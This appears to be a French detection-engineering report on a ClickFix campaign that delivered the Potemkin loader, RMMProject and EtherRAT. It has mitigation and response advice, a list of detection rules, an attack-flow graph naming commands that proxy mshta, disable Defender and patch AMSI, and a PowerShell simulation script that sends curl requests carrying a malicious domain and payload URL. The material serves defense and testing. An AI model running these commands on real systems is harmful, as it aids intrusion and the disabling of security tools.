Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une campagne de social engineering appelée ClickFix a été utilisée pour déployer le chargeur Potemkin, qui a ensuite livré à la fois le RAT RMMProject et EtherRAT. L’intrusion comprenait une activité directe sur le clavier, un mouvement latéral à travers WMIExec et SMBExec, et des tentatives pour affaiblir ou désactiver Microsoft Defender. Au total, les attaquants se sont propagés à plus de 11 systèmes à l’intérieur de l’environnement de la victime.
Enquête
L’enquête a retracé la compromission jusqu’à un endpoint non géré où un utilisateur a exécuté une commande malveillante. Les analystes ont identifié un chargeur personnalisé appelé Potemkin qui utilise un algorithme déterministe de génération de domaines, ainsi qu’un RAT activé par Lua nommé RMMProject qui pourrait contourner le chiffrement lié à l’application Chrome. Les chercheurs ont également documenté EtherRAT, qui récupère l’infrastructure de commandement et de contrôle via la blockchain Ethereum, ainsi que l’utilisation de tunnels Chisel lors de l’intrusion.
Atténuation
L’une des défenses les plus efficaces consiste à désactiver la boîte de dialogue Exécuter de Windows via la stratégie de groupe pour réduire les chances d’exécution de ClickFix. Les organisations devraient également activer la Protection contre la falsification de Microsoft Defender et surveiller les changements non autorisés dans le registre affectant les paramètres de sécurité ou les tentatives de désactiver le WinDefend service. Une couverture large et cohérente des endpoints reste essentielle pour empêcher les attaquants de prendre pied initialement.
Réponse
Si cette activité est détectée, les intervenants doivent isoler les systèmes affectés immédiatement pour stopper toute mouvement latéral supplémentaire. La remédiation devrait inclure la terminaison des processus malveillants Node.js, la suppression des mécanismes de persistance identifiés tels que les clés Run et les tâches planifiées, et le nettoyage des chemins d’exclusion non autorisés de Microsoft Defender. Un balayage complet de l’environnement est nécessaire car les méthodes de persistance peuvent différer d’un hôte à l’autre.
"graph TB %% Class Definitions classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#3498db,stroke:#333,stroke-width:2px classDef defense_evasion fill:#9b59b6,stroke:#333,stroke-width:2px classDef persistence fill:#2ecc71,stroke:#333,stroke-width:2px classDef c2 fill:#e74c3c,stroke:#333,stroke-width:2px classDef credential_access fill:#f1c40f,stroke:#333,stroke-width:2px classDef lateral_movement fill:#1abc9c,stroke:#333,stroke-width:2px classDef defense_impairment fill:#34495e,stroke:#333,stroke-width:2px %% Initial Access and Execution Phase action_clickfix["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Description: User is tricked via ClickFix social engineering to paste and run a command in the Windows Run Dialog.<br/><b/>Artifacts: cmd /min /c pcalua.exe -a mshta.exe…"] class action_clickfix initial_access exec_mshta["<b/>Action</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/>Description: Abuses pcalua.exe to proxy mshta.exe execution to fetch remote HTA payload.<br/><b/>Artifacts: hte.hta payload, pcalua.exe"] class exec_mshta execution exec_msiexec["<b/>Action</b> – <b>T1218.007 System Binary Proxy Execution: Msiexec</b><br/>Description: Malicious MSI package is silently installed using msiexec.<br/><b/>Artifacts: inst24.msi, msiexec /qn"] class exec_msiexec execution %% Persistence and Loader Phase persist_netsh["<b/>Action</b> – <b>T1546.007 Event Triggered Execution: Netsh Helper DLL</b><br/>Description: Persistence established via an MSI AutostartRegistry component.<br/><b/>Artifacts: Potemkin loader, RunSearch.exe in %LOCALAPPDATA%MicrosoftRunSearch"] class persist_netsh persistence %% Command and Control Phase c2_dga["<b/>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Description: Potemkin loader uses a Domain Generation Algorithm to find C2 servers.<br/><b/>Artifacts: Potemkin DGA"] class c2_dga c2 c2_ether["<b/>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Description: EtherRAT resolves its C2 address from the Ethereum blockchain via EtherHiding.<br/><b/>Artifacts: EtherRAT"] class c2_ether c2 %% Credential Access Phase cred_steal["<b/>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Description: RMMProject RAT targets browsers to steal cookies and credentials via DLL injection to bypass Chrome App-Bound Encryption.<br/><b/>Artifacts: RMMProject, browser SQLite databases"] class cred_steal credential_access %% Lateral Movement Phase lat_move["<b/>Action</b> – <b>T1210 Exploitation of Remote Services</b><br/>Description: Attacker moves laterally using WMIExec and SMBExec to spread the MSI installer.<br/><b/>Artifacts: WMIExec, SMBExec, msiexec /i <IP>ADMIN$Temp…"] class lat_move lateral_movement %% Defense Impairment Phase def_impair["<b/>Action</b> – <b>T1687 Exploitation for Defense Impairment</b><br/>Description: Fighting Windows Defender by patching AMSI, writing registry policies, and killing the service.<br/><b/>Artifacts: DisableAntiSpyware registry keys, Stop-Service WinDefend, AMSI patching"] class def_impair defense_impairment %% C2 Tunneling Phase c2_tunnel["<b/>Action</b> – <b>T1572 Protocol Tunneling</b><br/>Description: Using Chisel to establish reverse SOCKS tunnels and Cloudflare tunnels to expose internal services.<br/><b/>Artifacts: Chisel, cloudflared renamed to svchost.exe"] class c2_tunnel c2 %% Connections %% Flow from initial access to execution action_clickfix –>|leads_to| exec_mshta action_clickfix –>|leads_to| exec_msiexec %% Execution leads to persistence exec_msiexec –>|installs| persist_netsh %% Persistence leads to C2 and Loader deployment persist_netsh –>|deploys| c2_dga persist_netsh –>|deploys| c2_ether %% C2 activities lead to credential access c2_dga –>|executes| cred_steal c2_ether –>|executes| cred_steal %% Lateral movement spreads the attack cred_steal –>|enables| lat_move lat_move –>|deploys_to_new_hosts| exec_msiexec %% Defense impairment protects the attacker exec_mshta –>|used_to_patch| def_impair def_impair –>|facilitates| c2_tunnel "
Flux d’Attaque
Détections
Exécution de processus système depuis des chemins inusités (via process_creation)
Voir
Changements suspects des préférences de Windows Defender (via powershell)
Voir
Points de Persistance Possibles [ASEPs – Hive Software/NTUSER] (via registry_event)
Voir
Désactivation des protections de Windows Defender (via registry_event)
Voir
Modèles de ligne de commande Impacket possibles (via cmdline)
Voir
Arrêt suspect de services interférents de ransomware (via cmdline)
Voir
Possibilité d’exécution à travers des lignes de commande PowerShell cachées (via cmdline)
Voir
Exécution de binaire NodeJS depuis un emplacement peu commun (via cmdline)
Voir
LOLBAS Pcalua (via cmdline)
Voir
Comportement d’évasion de défense suspect MSHTA LOLBAS par détection de commandes associées (via process_creation)
Voir
LOLBAS Conhost (via cmdline)
Voir
Utilisation de Certutil pour l’encodage des données et les opérations de certificat (via cmdline)
Voir
Utilisation possible d’outils de tunneling [Windows] (via cmdline)
Voir
Utilisation suspecte de CURL (via cmdline)
Voir
Appel de méthodes .NET suspectes depuis Powershell (via powershell)
Voir
Fichier exécutable suspect nommé comme un processus système légitime a été créé (via file_event)
Voir
Tentative possible d’abus Ethereum Publicnode en tant que canal C2 (via dns_query)
Voir
Téléchargement de fichier suspect par IP directe (via proxy)
Voir
Exécution de scripts PowerShell et manipulation de Windows Defender [Windows Powershell]
Voir
Détection de communication C2 basée sur Ethereum par EtherRAT [Connexion réseau Windows]
Voir
Détection de livraison de charge utile ClickFix HTA via Mshta.exe [Création de processus Windows]
Voir
Exécution de Simulation
Prérequis : La vérification pré-vol de télémétrie et de base doit avoir été réussie.
Raisonnement : Cette section détaille l’exécution précise de la technique adverse (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit doivent refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou sans rapport conduiront à un mauvais diagnostic.
-
Narratif d’Attaque et Commandes : L’adversaire cherche à établir un canal C2 en utilisant la méthode de signature d’EtherRAT. Pour échapper à l’analyse statique de leur configuration de malware, ils utilisent
curlpour effectuer une requête HTTP POST vers un point final Ethereum RPC public (https://eth.drpc.org). Cette requête est conçue pour récupérer la véritable IP/domain C2 de la blockchain. Pour satisfaire la logique spécifique de la règle de détection actuelle, la commande est structurée pour inclure le domaine malveillant connuanus-staylard.xyzdans les arguments de ligne de commande, simulant la livraison de charge utile ou la phase de configuration. -
Script de test de régression :
# Simulation de résolution C2 EtherRAT via Ethereum RPC # Ce script mime les modèles de ligne de commande spécifiques requis pour déclencher la règle Sigma. $maliciousDomain = "anus-staylard.xyz" $rpcEndpoint = "https://eth.drpc.org" $maliciousIpString = "77.110.122.58:23205/lQhEQui9a4lZ.exe" # Construction de la commande pour correspondre à la logique (sélection1 OU sélection2) ET sélection3 # Modèle : curl -s -X POST https://eth.drpc.org ... anus-staylard.xyz $cmd = "curl.exe -s -X POST $rpcEndpoint -d 'data=query' --user-agent '$maliciousDomain' --referer '$maliciousIpString'" Write-Host "[+] Exécution de la commande simulée EtherRAT : $cmd" Start-Process "cmd.exe" -ArgumentList "/c $cmd" -NoNewWindow -
Commandes de Nettoyage :
# Aucun fichier permanent n'est créé par cette simulation ; # seule l'exécution de processus éphémères a lieu. Write-Host "[+] Simulation terminée. Aucun nettoyage requis."